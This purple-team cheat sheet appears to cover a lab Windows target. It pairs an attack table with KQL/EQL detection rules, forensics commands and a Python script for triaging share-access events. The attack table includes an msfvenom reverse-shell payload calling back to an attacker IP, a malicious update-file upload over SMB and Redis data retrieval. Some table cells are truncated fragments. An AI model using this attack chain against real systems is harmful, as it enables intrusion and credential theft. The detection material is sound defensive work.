The audit log was cleared.
`SecurityEvent

Forensics Commands and Codes

Command
Description
tcpdump -i eth0 port 80 -w http_traffic.pcap
Captures HTTP traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py --storage-file timeline.plaso image.E01 && psort.py -z UTC -o l2tcsv -w timeline.csv timeline.plaso
Extracts a timeline from a forensic image (log2timeline.py) and sorts it to CSV (psort.py); -z, -o and -w are psort.py options, not log2timeline.py options.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: Unusual Network Traffic

// NetworkTraffic is not a built-in table; DeviceNetworkEvents (Defender for
// Endpoint) is used. A scripting host talking HTTP(S) to an address outside the
// allow-list is worth seeing even once, so no count threshold is applied.
let known_good_ips = dynamic(["known_good_ip"]);
DeviceNetworkEvents
| where RemotePort in (80, 443) and RemoteIP !in (known_good_ips)
| where InitiatingProcessFileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "certutil.exe", "bitsadmin.exe")
| summarize Count = count() by DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteIP, RemotePort

EQL Rule: Suspicious Process Creation

// sequence.count is not EQL syntax; a netcat binary spawned by a PowerShell parent
// on a single 4688 is the tighter match. process.parent.name needs the 4688
// "Creator Process Name" field (Windows 10 / Server 2016 and later).
process where event.code == "4688" and
  process.name : "nc.exe" and process.parent.name : ("powershell.exe", "pwsh.exe")

KQL Rule: Abnormal File Access

// Administrative-share access from a client address. ShareName is logged as
// \\*\C$, which needs a verbatim string in KQL; AccessMask separates a drop
// (0x2 WriteData bit set) from a read.
SecurityEvent
| where EventID == 5145 and ShareName in (@'\\*\C$', @'\\*\ADMIN$')
| where not(Account endswith "$")
| project TimeGenerated, Computer, Account, IpAddress, ShareName, RelativeTargetName, AccessMask

Purple Team Cheat Sheet: Recon to Exploitation Scenario

Attack Techniques and Commands

Stage
Technique
Command
Description
Recon
Nmap Scanning
nmap -sV -sC -oN nmap 10.10.10.237
Scans the target for open ports and services.
Recon
File Analysis
file headv1\\Setup\\1.0.0.exe
Analyzes the executable file for type and content.
Recon
SMB Enumeration
smbclient -L \\\\10.10.10.237
Enumerates SMB shares on the target.
Recon
SMB File Transfer
smbclient \\\\10.10.10.237\\Software_Updates then get UAT_Testing_Procedures.pdf
Transfers files via SMB.
Exploitation
Crafting Malicious Binary
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.30 LPORT=9001 -f exe -o "rspoof.exe"
Creates a reverse shell executable.
Exploitation
YML File Creation
Manual creation of latest.yml file
Creates a .yml file for the exploit.
Exploitation
SMB File Transfer
smbclient \\\\10.10.10.237\\Software_Updates then put latest.yml
Uploads .yml file via SMB.
Exploitation
Reverse Shell
Use Metasploit to listen for the reverse shell
Listens for an incoming reverse shell connection.
Exploitation
Redis Exploitation
redis-cli -h 10.10.10.237 then get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
Exploits Redis to retrieve data.
Exploitation
Password Decryption
python3 decrypt.py with the script provided in the summary
Decrypts a password using a provided script.

Detection: Event Codes and KQL/EQL Rules

Event Code
Description
KQL/EQL Rule
4624
An account was successfully logged on.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
1102
The audit log was cleared.
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested.
`SecurityEvent

Forensics Commands and Codes

Command
Description
tcpdump -i eth0 port 445 -w smb_traffic.pcap
Captures SMB traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py --storage-file timeline.plaso image.E01 && psort.py -z UTC -o l2tcsv -w timeline.csv timeline.plaso
Extracts a timeline from a forensic image (log2timeline.py) and sorts it to CSV (psort.py); -z, -o and -w are psort.py options, not log2timeline.py options.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: Unusual SMB Traffic

// The attack step is a write of latest.yml and the payload into the update share;
// reads of the share are what clients do all day. AccessMask 0x2 (WriteData /
// AddFile) marks the write, and ShareName needs a verbatim string in KQL.
SecurityEvent
| where EventID == 5145 and ShareName == @'\\*\Software_Updates'
| where not(Account endswith "$")
| project TimeGenerated, Computer, Account, IpAddress, RelativeTargetName, AccessMask
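Added example, not part of the cheat sheet: the 5145 share-access checks from the admin-share rules in the two scenario sheets above and from the Software_Updates rule here, with the AccessMask decoded so that writes (the payload drop) are separated from reads, which the KQL rules only project for a human to read. Records are constructed 5145 event-data dicts using the Windows field names (ShareName, RelativeTargetName, AccessMask, SubjectUserName, IpAddress); the watched share list and the sample events are assumptions.

```python
"""5145 share-access triage: watched shares, machine-account filter, AccessMask decode.

Added example (not from the cheat sheet). SAMPLE_5145 and WATCHED_SHARES are constructed.
"""
from collections import namedtuple

# File-object ACCESS_MASK bits as they appear in the 5145 AccessMask field.
ACCESS_BITS = {
    0x1: "ReadData", 0x2: "WriteData", 0x4: "AppendData", 0x8: "ReadEA",
    0x10: "WriteEA", 0x20: "Execute", 0x40: "DeleteChild", 0x80: "ReadAttributes",
    0x100: "WriteAttributes", 0x10000: "Delete", 0x20000: "ReadControl",
    0x40000: "WriteDac", 0x80000: "WriteOwner", 0x100000: "Synchronize",
}
# Anything in this set changes the object; a read-only open never sets them.
WRITE_BITS = 0x2 | 0x4 | 0x10 | 0x40 | 0x100 | 0x10000 | 0x40000 | 0x80000

WATCHED_SHARES = {r"\\*\C$", r"\\*\ADMIN$", r"\\*\Software_Updates"}

ShareHit = namedtuple("ShareHit", "account ip share target rights")


def decode_access_mask(mask):
    """'0x12019f'-style string -> names of the set bits, lowest bit first."""
    value = int(mask, 16)
    return [name for bit, name in sorted(ACCESS_BITS.items()) if value & bit]


def share_write_hits(events, shares=WATCHED_SHARES):
    """Non-machine accounts opening a watched share with any write right."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 5145 or ev["ShareName"] not in shares:
            continue
        if ev["SubjectUserName"].endswith("$"):   # computer accounts: GPO/SYSVOL noise
            continue
        if int(ev["AccessMask"], 16) & WRITE_BITS:
            hits.append(ShareHit(ev["SubjectUserName"], ev["IpAddress"], ev["ShareName"],
                                 ev["RelativeTargetName"], decode_access_mask(ev["AccessMask"])))
    return hits


def _ev(user, ip, share, target, mask):
    return {"EventID": 5145, "SubjectUserName": user, "IpAddress": ip,
            "ShareName": share, "RelativeTargetName": target, "AccessMask": mask}


# Constructed sample: a tool drop into ADMIN$, the latest.yml write into the update
# share, a legitimate PDF read from the same share, a machine account, and a
# write to a share nobody watches.
SAMPLE_5145 = [
    _ev("j.doe", "10.10.14.5", r"\\*\ADMIN$", "nc.exe", "0x12019f"),
    _ev("k.svensson", "10.0.0.31", r"\\*\Software_Updates", "latest.yml", "0x2"),
    _ev("a.smith", "10.0.0.40", r"\\*\Software_Updates", "UAT_Testing_Procedures.pdf", "0x120089"),
    _ev("DC01$", "10.0.0.1", r"\\*\C$", "Windows\\Temp\\x.tmp", "0x2"),
    _ev("a.smith", "10.0.0.40", r"\\*\Public", "notes.txt", "0x2"),
]

if __name__ == "__main__":
    for hit in share_write_hits(SAMPLE_5145):
        print(hit)
```

The same write-bit test is what the KQL rules need in a `where` clause; since AccessMask arrives as a hex string, doing the decode at ingestion (or in a function like this one over exported rows) avoids string-matching individual mask values.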

EQL Rule: Suspicious Process Execution

// redis-cli runs on the attacker's machine and never appears in the victim's 4688,
// and sequence.count is not EQL. The observable chain is a write into the update
// share on the file server followed by the dropped binary starting on a client,
// so the sequence is joined by time only (the two events come from different hosts).
sequence with maxspan=30m
  [any where event.code == "5145" and winlog.event_data.ShareName == "\\\\*\\Software_Updates"
   and winlog.event_data.AccessMask == "0x2"]
  [process where event.code == "4688" and process.name : "rspoof.exe"]

KQL Rule: Abnormal File Access Patterns

SecurityEvent